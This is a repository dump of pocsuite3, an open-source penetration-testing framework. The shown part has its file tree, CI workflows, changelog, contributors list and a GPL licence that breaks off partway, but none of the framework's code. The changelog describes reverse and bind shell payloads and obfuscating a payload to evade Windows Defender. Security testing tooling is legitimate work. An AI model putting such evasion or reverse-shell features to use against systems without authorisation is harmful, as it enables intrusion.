Showing preview only (772K chars total). Download the full file or copy to clipboard to get everything.
Repository: knownsec/pocsuite3
Branch: master
Commit: 9bed2883b86a
Files: 164
Total size: 725.2 KB
Directory structure:
gitextract_rxnectch/
├── .coveragerc
├── .github/
│ └── workflows/
│ ├── lint.yml
│ ├── pylint.yml
│ ├── release.yml
│ └── test.yml
├── .gitignore
├── CHANGELOG.md
├── CONTRIBUTORS.md
├── COPYING
├── Dockerfile
├── MANIFEST.in
├── README.md
├── docs/
│ ├── CODING.md
│ └── USAGE.md
├── make.bat
├── makefile
├── manpages/
│ ├── poc-console.1
│ └── pocsuite.1
├── pocsuite3/
│ ├── __init__.py
│ ├── api/
│ │ └── __init__.py
│ ├── cli.py
│ ├── console.py
│ ├── data/
│ │ └── password-top100.txt
│ ├── lib/
│ │ ├── __init__.py
│ │ ├── controller/
│ │ │ ├── __init__.py
│ │ │ └── controller.py
│ │ ├── core/
│ │ │ ├── __init__.py
│ │ │ ├── clear.py
│ │ │ ├── common.py
│ │ │ ├── convert.py
│ │ │ ├── data.py
│ │ │ ├── datatype.py
│ │ │ ├── decorators.py
│ │ │ ├── docker_env.py
│ │ │ ├── enums.py
│ │ │ ├── exception.py
│ │ │ ├── interpreter.py
│ │ │ ├── interpreter_option.py
│ │ │ ├── log.py
│ │ │ ├── option.py
│ │ │ ├── optiondict.py
│ │ │ ├── plugin.py
│ │ │ ├── poc.py
│ │ │ ├── readlineng.py
│ │ │ ├── register.py
│ │ │ ├── revision.py
│ │ │ ├── settings.py
│ │ │ ├── shell.py
│ │ │ ├── statistics_comparison.py
│ │ │ ├── template.py
│ │ │ ├── threads.py
│ │ │ └── update.py
│ │ ├── helper/
│ │ │ ├── __init__.py
│ │ │ ├── archieve/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── jar.py
│ │ │ │ ├── memoryzip.py
│ │ │ │ ├── war.py
│ │ │ │ └── zip.py
│ │ │ └── java/
│ │ │ ├── __init__.py
│ │ │ └── serialization.py
│ │ ├── parse/
│ │ │ ├── __init__.py
│ │ │ ├── cmd.py
│ │ │ ├── configfile.py
│ │ │ ├── dockerfile.py
│ │ │ ├── rules.py
│ │ │ └── url.py
│ │ ├── request/
│ │ │ ├── __init__.py
│ │ │ └── patch/
│ │ │ ├── __init__.py
│ │ │ ├── add_httpraw.py
│ │ │ ├── hook_request.py
│ │ │ ├── hook_request_redirect.py
│ │ │ ├── hook_urllib3_parse_url.py
│ │ │ ├── remove_ssl_verify.py
│ │ │ ├── remove_warnings.py
│ │ │ ├── session_reuse.py
│ │ │ └── unquote_request_uri.py
│ │ ├── utils/
│ │ │ ├── __init__.py
│ │ │ ├── markup.py
│ │ │ └── pcap_sniffer.py
│ │ └── yaml/
│ │ ├── __init__.py
│ │ └── nuclei/
│ │ ├── __init__.py
│ │ ├── model/
│ │ │ └── __init__.py
│ │ ├── operators/
│ │ │ ├── __init__.py
│ │ │ ├── extrators/
│ │ │ │ └── __init__.py
│ │ │ └── matchers/
│ │ │ └── __init__.py
│ │ ├── protocols/
│ │ │ ├── __init__.py
│ │ │ ├── common/
│ │ │ │ ├── expressions/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── safe_eval.py
│ │ │ │ ├── generators/
│ │ │ │ │ └── __init__.py
│ │ │ │ ├── interactsh/
│ │ │ │ │ └── __init__.py
│ │ │ │ └── replacer/
│ │ │ │ └── __init__.py
│ │ │ ├── http/
│ │ │ │ └── __init__.py
│ │ │ └── network/
│ │ │ └── __init__.py
│ │ └── templates/
│ │ └── __init__.py
│ ├── modules/
│ │ ├── __init__.py
│ │ ├── censys/
│ │ │ └── __init__.py
│ │ ├── ceye/
│ │ │ └── __init__.py
│ │ ├── fofa/
│ │ │ └── __init__.py
│ │ ├── httpserver/
│ │ │ └── __init__.py
│ │ ├── hunter/
│ │ │ └── __init__.py
│ │ ├── interactsh/
│ │ │ └── __init__.py
│ │ ├── listener/
│ │ │ ├── __init__.py
│ │ │ ├── bind_tcp.py
│ │ │ └── reverse_tcp.py
│ │ ├── quake/
│ │ │ └── __init__.py
│ │ ├── seebug/
│ │ │ └── __init__.py
│ │ ├── shodan/
│ │ │ └── __init__.py
│ │ ├── spider/
│ │ │ └── __init__.py
│ │ └── zoomeye/
│ │ └── __init__.py
│ ├── plugins/
│ │ ├── __init__.py
│ │ ├── file_record.py
│ │ ├── html_report.py
│ │ ├── poc_from_pocs.py
│ │ ├── poc_from_redis.py
│ │ ├── poc_from_seebug.py
│ │ ├── target_from_censys.py
│ │ ├── target_from_cidr.py
│ │ ├── target_from_fofa.py
│ │ ├── target_from_hunter.py
│ │ ├── target_from_quake.py
│ │ ├── target_from_redis.py
│ │ ├── target_from_shodan.py
│ │ ├── target_from_zoomeye.py
│ │ └── web_hook.py
│ └── shellcodes/
│ ├── __init__.py
│ ├── base.py
│ ├── data/
│ │ ├── java/
│ │ │ └── src/
│ │ │ └── ReverseTCP/
│ │ │ └── Payload.java
│ │ ├── linux/
│ │ │ ├── src/
│ │ │ │ ├── bind_tcp.asm
│ │ │ │ └── reverse_tcp.asm
│ │ │ └── x64/
│ │ │ └── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── windows/
│ │ ├── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── x64/
│ │ └── src/
│ │ ├── bind_tcp.asm
│ │ └── reverse_tcp.asm
│ ├── dotnet.py
│ ├── encoder.py
│ ├── generator.py
│ ├── java.py
│ ├── php.py
│ └── python.py
├── requirements.txt
├── setup.cfg
├── setup.py
├── test.py
└── tests/
├── __init__.py
├── login_demo.py
├── test_api_diy_options.py
├── test_api_get_poc_info.py
├── test_build_url.py
├── test_check_install_requires.py
├── test_cmd_diy_options.py
├── test_configfile.py
├── test_generate_shellcode_list.py
├── test_httpserver.py
├── test_import_pocsuite_execute.py
├── test_interactsh_module.py
├── test_nuclei_helper_functions.py
├── test_osshell.py
├── test_parse_target.py
├── test_request_raw.py
├── test_show_poc_options.py
├── test_spier_crawl.py
└── test_webshell.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .coveragerc
================================================
[run]
include = pocsuite3/*
omit =
*migrations*
*tests*
venv/*
[report]
include = pocsuite3/*
omit =
*migrations*
*tests*
venv/*
exclude_lines =
pragma: no cover
def __repr__
def __str__
if self.debug:
if settings.DEBUG
raise AssertionError
raise NotImplementedError
if __name__ == .__main__.:
================================================
FILE: .github/workflows/lint.yml
================================================
name: Lint
on: [pull_request]
jobs:
lint:
strategy:
matrix:
python-version: ['3.10']
os: [ubuntu-latest]
runs-on: ${{ matrix.os }}
timeout-minutes: 30
steps:
- uses: actions/checkout@v2
- name: Cache for pip
uses: actions/cache@v1
id: cache-pip
with:
path: ~/.cache/pip
key: ${{ matrix.os }}-cache-pip
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v1
with:
python-version: ${{ matrix.python-version }}
- name: Critical lint
run: |
pip install flake8
# https://michaelcurrin.github.io/dev-cheatsheets/cheatsheets/python/linting/flake8.html
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
- name: Style lint
run: |
flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --ignore=C901,W503,W504,E741 --statistics > current.txt
git fetch origin
git checkout origin/"$GITHUB_BASE_REF"
flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --ignore=C901,W503,W504,E741 --statistics > base.txt
if diff base.txt current.txt | grep "^> ./"; then
false
fi
================================================
FILE: .github/workflows/pylint.yml
================================================
name: PyLint
on: [pull_request]
jobs:
pylint:
strategy:
matrix:
python-version: ['3.10']
os: [ubuntu-latest]
runs-on: ${{ matrix.os }}
timeout-minutes: 30
steps:
- uses: actions/checkout@v2
- name: Cache for pip
uses: actions/cache@v1
id: cache-pip
with:
path: ~/.cache/pip
key: ${{ matrix.os }}-cache-pip
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v1
with:
python-version: ${{ matrix.python-version }}
- name: PyLint
run: |
set -x
pip install pylint
pip install --upgrade -r requirements.txt
# TODO: donot ignore serialization.py
pylint --exit-zero --errors-only --ignore=serialization.py pocsuite3 > current.txt
git fetch origin
git checkout origin/"$GITHUB_BASE_REF"
pylint --exit-zero --errors-only --ignore=serialization.py pocsuite3 > base.txt
if diff base.txt current.txt | grep "^> "; then
false
fi
================================================
FILE: .github/workflows/release.yml
================================================
name: Release Package
on:
push:
tags:
- v*
jobs:
pypi:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Set up Python
uses: actions/setup-python@v3
with:
python-version: '3.x'
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install build
- name: Build package
run: python -m build
- name: Publish package
uses: pypa/gh-action-pypi-publish@27b31702a0e7fc50959f5ad993c78deac1bdfc29
with:
user: __token__
password: ${{ secrets.PYPI_API_TOKEN }}
homebrew:
runs-on: ubuntu-latest
needs:
- pypi
steps:
- name: Update Homebrew formula
uses: 13ph03nix/action-homebrew-bump-formula@v3
with:
token: ${{ secrets.BREW_TOKEN }}
formula: pocsuite3
aur:
runs-on: ubuntu-latest
needs:
- pypi
steps:
- name: Checkout PKGBUILD repo
run: |
echo "$AUR_SSH_KEY" > ~/aur_ssh_key
chmod 600 ~/aur_ssh_key
git config --global core.sshCommand "ssh -i ~/aur_ssh_key -o 'StrictHostKeyChecking=no'"
git clone "aur@aur.archlinux.org:pocsuite3.git" .
env:
AUR_SSH_KEY: ${{ secrets.AUR_SSH_KEY }}
- name: Update Version
run: |
export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')
sed -i "s/^pkgver=.*\$/pkgver=${VERSION}/g" PKGBUILD
sed -i "s/^pkgrel=.*\$/pkgrel=1/g" PKGBUILD
env:
GH_REF: ${{ github.ref }}
- name: Update .SRCINFO and checksum
uses: 13ph03nix/archlinux-package-action@v2
with:
flags: ''
namcap: false
updpkgsums: true
srcinfo: true
- name: Commit and push changes
run: |
export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')
git config --global user.email "abcnsxyz@gmail.com"
git config --global user.name '13ph03nix'
git commit -a -m "Version ${VERSION} (automated version bump)"
git push origin master
env:
GH_REF: ${{ github.ref }}
dockerhub:
runs-on: ubuntu-latest
needs:
- pypi
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Build
env:
GH_REF: ${{ github.ref }}
run: |
export VERSION=$(echo $GH_REF | sed 's:refs/tags/v::')
docker build --build-arg version=${VERSION} \
--tag pocsuite3/pocsuite3:v${VERSION} \
--tag pocsuite3/pocsuite3:latest \
.
- name: Login
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKER_USERNAME }}
password: ${{ secrets.DOCKER_PASSWORD }}
- name: Push
run: |
docker push -a pocsuite3/pocsuite3
================================================
FILE: .github/workflows/test.yml
================================================
name: Test
on: [pull_request]
jobs:
test:
strategy:
matrix:
python-version: ['3.9', '3.11']
os: [ubuntu-latest, macos-latest, windows-latest]
runs-on: ${{ matrix.os }}
timeout-minutes: 30
steps:
- uses: actions/checkout@v4
- name: Cache for pip
uses: actions/cache@v4
id: cache-pip
with:
path: ~/.cache/pip
key: ${{ matrix.os }}-cache-pip
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install dependencies & Test
run: |
pip install --upgrade pip
pip install --upgrade setuptools
pip install --upgrade -r requirements.txt
python setup.py install
python test.py
================================================
FILE: .gitignore
================================================
### OSX ###
.DS_Store
.AppleDouble
.LSOverride
### SublimeText ###
# cache files for sublime text
*.tmlanguage.cache
*.tmPreferences.cache
*.stTheme.cache
# workspace files are user-specific
*.sublime-workspace
# project files should be checked into the repository, unless a significant
# proportion of contributors will probably not be using SublimeText
# *.sublime-project
# sftp configuration file
sftp-config.json
# Basics
*.py[cod]
__pycache__
# Logs
logs
*.log
pip-log.txt
npm-debug.log*
# Unit test / coverage reports
.coverage
.tox
nosetests.xml
htmlcov
# Translations
*.mo
*.pot
# Pycharm
.idea/
# Vim
*~
*.swp
*.swo
# npm
node_modules/
# Compass
.sass-cache
# virtual environments
env/
.env
venv36/
venv/
# vscode
.vscode/
# wakatime
.wakatime-project
# other
build/
dist/
*.egg-info
.eggs/
pocsuite.ini
pocsuite3/pocs/
pocsuite3/data/cacert.pem
================================================
FILE: CHANGELOG.md
================================================
# version 2.1.0
----------------
* fix codes ignored in raw strings #432
* update zoomeye api to v2
# verison 2.0.8
* Fix nucleic dsl syntax parsing #386 @xixixiba
* Fix the compatibility issue of -l command in windows #400 @geelph
# version 2.0.7
* add http debug level command line parameter --http-debug
* fix some bug
# version 2.0.6
* add new command -l show local poc
* build the corresponding vulnerability environment based on the PoC, For details, please refer to pocs/Apache_Struct2
# version 2.0.5
----------------
* fix hook failure due to urllib3 update #368 #373
* optimize DSL expression execution #372
* making mmh3 an optional dependency #359
* disable mandatory updates
# version 2.0.4
----------------
* Updated protocol names that are compatible with Nuclei v2.9.1
# version 2.0.3
----------------
* optimized URL protocol correction #356, thanks @chenjiewei123
* support disable protocol correction and honeypot checks through --no-check option
# version 2.0.2
----------------
* fix url redirect problem in _check method #337
* fix use command in console mode can't use absolute path #341, thanks @S2eTo
* fix ipv6 compatibility issue in build_url #347, thanks @HomerQing
* optimize dsl expression execution #348
# version 2.0.1
----------------
* fix words matcher expression execution #333, thanks @soapffz
* fix catch binascii ValueError Exception #334, thanks @izj007
* improve template robustness
* support digest_username and digest_password
* support negative matchers
# version 2.0.0
----------------
* yaml poc support, compatible with nuclei
* fix httpserver module hangs on macos platform
* auto correction of url protocol based on status code
# version 1.9.11
----------------
* support customize poc protocol and default port #321
* -p option support optional protocol field, [proto:]port #323
* add -s option to skip target default port #323
* poc-console optimization
* some bug fixes & improvements
# version 1.9.10
----------------
fix different python versions have different behaviors on ipaddress library #319
# version 1.9.9
----------------
* auto correct url based on poc's protocol attribute #316
* fix Colorizing doesn't work on Windows with poc-console #318
* trail slash at the end of url #314
# version 1.9.8
----------------
* support full PoC search by regex keyword #312
* set default value for PoC in POCBase #312
* add bind/reverse shell payload #311
* fix fofa query over multiple pages #310
# version 1.9.7
----------------
* improve encoding compatibility #305
* obfuscate REVERSE_PAYLOAD to evade windows defender #306
* improve --ppt
# version 1.9.6
----------------
* support -o parameter, save the result in json lines format
* optimize timeout for cyberspace search engine plugins
* optimize the handling of the url protocol
* docs update
# version 1.9.5
----------------
* refactor --ppt, optimize mosaic for url
* optimize poc template
* optimize pocsuite command default prompt message
* adjust the default timeout to 10 seconds
* adjust the default number of threads to 150
* target url support cidr, user can use -p provide additional ports
* support local mode, local mode do not need any targets, e.g. LPE
* bug fixes
# version 1.9.4
-----------------
* support poc template generate
* support custom interactsh server
* Switch the authentication method of ZoomEye and CEYE to API-KEY
* support honeypot detect
* support http/https protocol autocorrect
* refactor --update
* support version check
# version 1.9.3
-----------------
* add support for qianxin hunter cyberspace search engine
* support self.rhost & self.rport in POCBase
# version 1.9.2
-----------------
* Improved shell mode
# version 1.9.1
-----------------
* fix #272, #274
* the hook support of requests can be used alone
* refactor shell mode, add handle for keyboard interrupt
# version 1.9.0
-----------------
* Fix urllib3 issue with parsing URIs
* Prevent URL encoding
# version 1.8.12
-----------------
* update fofa api url #263
# version 1.8.11
-----------------
* fix windows log color issue #258
# version 1.8.10
-----------------
* fix #254
* fix urlparse fails with simple url
* use pycryptodomex instead of pycryptodome, fix #255
# version 1.8.9
-----------------
* fix user-agent bug #252
# version 1.8.8
-----------------
* rewrite multi module
* integrate with interactsh
* support filter poc by keyword
# version 1.8.7
-----------------
* fix bug
* optimize code style & docs
* delete the exe tool for compatibility with dfsg
# version 1.8.6
-----------------
* support encrypted shell (TLS) in shell mode
* fix #228
# version 1.8.5
-----------------
* support bind shell in shell mode
* fix #221
# version 1.8.4
-----------------
* update docs
* fix typo
# version 1.8.3
-----------------
* some improvements related to dependent
# version 1.8.2
-----------------
* fix finding a python module version gives error
# version 1.8.1
-----------------
* fix check_requires() can not handle dependent version correctly #208
* update docs
# version 1.8.0
-----------------
* fix the timeout problem in shell mode leads to confusing results
* made some improvements with network address related issues
# version 1.7.8
-----------------
* add option to display extra parameters of poc
* add more poc attribute to result dict
* allow custom module path in console mode
* fix some compatibility problems
# version 1.7.7
-----------------
* 添加--dork自动用poc中的dork字段扫描功能
* 适配Debian源格式需求
# version 1.7.6
-----------------
* fixes #192
# version 1.7.5
-----------------
* 添加录包功能和dork字段支持base64编码 fixes #169 #173
* 修复target插件requests参数无效bug fix #183
# version 1.7.4
-----------------
* 修复批量执行poc时因为报错导致扫描中断问题 fixes #149
* 修复--pocs-path参数bug
# version 1.7.2
-----------------
* 增加powershell bash反弹shell 以及编码函数
# version 1.7.0
-----------------
* 修复`Python 3.9`兼容性问题
* console模式,添加系统命令执行,添加pocuite3命令clear清除屏幕
# version 1.6.5
----------------
* 修复http请求头不能删除
* 修复html导出编码错误
* 修复console模式下lport设置失败
* shell模式可以使用select或use选择shell
# version 1.6.4
----------------
* 测试Github Action自动发布pypi
# version 1.6.0~1.6.3
---------------
* 添加随机UA头选项
* 重构--ppt隐藏信息选项
* 当poc有语法错误时,显示详细信息
* 添加InMemoryWar
* 修复urllib3的`chunk_length`错误
* 加入打tag自动构建发布到pypi
# version 1.5.9
---------------
* 增加了poc类型的枚举类型 #95
* 修改了样例poc
# version 1.5.8
---------------
* 修复shadon api问题
* 加入fofa api接口
# version 1.5.7
---------------
* 取消pyreadline报错提示
* 修改日志拼写错误
# version 1.5.6
---------------
* 修复多线程卡住问题
* 修复seebug api问题
* 修复socks5代理问题
# version 1.5.5
---------------
* fix #87
# version 1.5.4
---------------
* 加入获取PoC信息的API
* 更新测试用例
# version 1.5.3
---------------
* socket代理增加变量保存原始socket信息,方便使用后恢复(`conf.origin_socks`)
* 修复requests代理指定为None时的逻辑问题
# version 1.5.2
---------------
* typo fix #84
* bugfix 自定义cookie产生的异常情况
* bugfix 引入pocsuite3后再次引入requests导致的报错
# version 1.5.1
---------------
* 修复插件调用poc失败的问题
# version 1.5.0
---------------
* 修复timeout一处异常
* pocsuite3.api 添加 `random_str`
* 优化update function
# version 1.4.9
---------------
* 修复requirement检测一处bug
* 修复reverse 一处异常
# version 1.4.8
---------------
* console模式下设置ip可以选择序号 `show ip` `set lhost 0`
* bugfix for ceye dns api
# version 1.4.7
---------------
* 修复console模式下回连shell循环的异常
# version 1.4.6
---------------
* 修复`-v`出现的问题
* 修复加载多个poc可能出现的问题
# version 1.4.5
---------------
* update usage.md
# version 1.4.3
---------------
* 加入PPT模式(用于演示,敏感信息将打上*)
# version 1.4.2
---------------
* 修复console模式下一处bug,https://github.com/knownsec/pocsuite3/pull/61
# version 1.4.1
---------------
* 修复由poc插件中由conf.poc引起的错误
# version 1.4.0
---------------
* 在命令行下url和poc支持多个(空格分隔)
* 更换`optparse`到`argparse`
# version 1.3.9
---------------
* 修复plugins选项加载绝对路径问题
* 修复加载pocs目录扫描部分报错问题
* PoC插件`add_poc`方法新增`fullname`参数用于定义加载poc名称
* 定义api模式方便shell集成
# version 1.3.8
---------------
* add field,option for compatibility with zipoc
# version 1.3.7
---------------
* add poc-plugin to load poc from `pocs` directories.
# version 1.3.6
---------------
* Bugfix parameter `version`
# version 1.3.5
---------------
* Add parameter `-c` for load configuration from the configuration file
* Add parameter `--comparsion` for comparing comparing both of zoomeye and shodan
* Interface supports from zoomeye,shodan and censys
# version 1.3.4
---------------
Cross-platform shell code generation
# version 1.3.3
---------------
fix #37 pocsuite3\lib\core\revision.py
# version 1.3.2
---------------
* bugfix poc thinkphp_rce
# version 1.3.1
---------------
* add confluence poc
* fix pocs/drupalgeddon2
* CYGWIN compatibility
* bugfix revision.py `stdout_encode`
# version 1.3.0
---------------
* new feature: `_verify` `_attack` function can directly return bool, str, dict, etc.
* new plugin: file report
* bugfix get_option() not support int
# version 1.2.10
---------------
* bugfix interpreter_option OptDict
# version 1.2.9
---------------
* seebug poc friendly load reminder
* new feature:displayed results after user interruption
* POC specifies third-party module verification failure
* customize option iter func
* Built-in http server
# version 1.2.8
---------------
* support ceye token
* bugfix plugin from seebug
* refactoring ceye
# version 1.2.7
---------------
* bugfix hook_requests
# version 1.2.6
---------------
* bugfix seebug poc
# version 1.2.5
---------------
* bugfix socks proxy
# version 1.2.2
---------------
* bugfix site-packages poc-console issue
* poc-console support to load absolute path
* poc-console will ignore case when use `search`
# version 1.2.1
---------------
* bugfix auto update error
* bugfix console mode load poc error
* update pocsuite3 banner
# version 1.0
---------------
* Init publish
================================================
FILE: CONTRIBUTORS.md
================================================
hysia <s1@seebug.org>
* for contributing core code
badcode <s1@seebug.org>
* for contributing core code
cc <s1@seebug.org>
* for contributing core code
w7ay <https://github.com/boy-hack>
* for contributing core code
fenix <https://github.com/13ph03nix>
* for contributing core code
phithon <root(at)leavesongs.com>
* for suggesting a couple of features
longofo
* for contributing http server module
Ro0tk1t <https://github.com/Ro0tk1t>
* for contributing multi-ip multi-poc execution features
* fix some issues
hawoosec <hanwu@protonmail.com>
* for reporting a bug
* for contributing a minor patch
* bugfix invalid client
* for contributing `set lhost index`
Explorer1092 <https://github.com/Explorer1092>
* update usage.md
gsfish <https://github.com/gsfish>
* good first issue #85
* repair the custom cookie anomalies
Becivells <https://github.com/Becivells>
* bugfix shodan api
* for contributing fofa api
* for contributing random user-agent switch
* bugfix #187
hex0wn <https://github.com/hex0wn>
* bugfix #139
MrMetatron <https://github.com/MrMetatron>
* console 模式,添加系统命令执行,添加 pocsuite3 命令 clear 清除屏幕功能
z3r0yu <https://github.com/zer0yu>
* Add quake dork for pocsuite3
Rook1e <https://github.com/0x2E>
* Add CI to build and push Docker image to DockerHub
ekszz <https://github.com/ekszz>
* contributing to customize poc protocol and default port #321
HomerQing <https://github.com/HomerQing>
* contributing to fix ipv6 compatibility issue in build_url
Xxcdd <https://github.com/xxcdd>
* Add support for requests session reuse
* Add support for web hook
================================================
FILE: COPYING
================================================
COPYING -- Describes the terms under which pocsuite is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
pocsuite3 is (C) 2014-present 404-team@knownsec.com
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; Version 2 with the clarifications and
exceptions described below. This guarantees your right to use, modify, and
redistribute this software under certain conditions. If you wish to embed
pocsuite technology into proprietary software, we sell alternative licenses
(contact pocsuite@seebug.org).
****************************************************************************
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
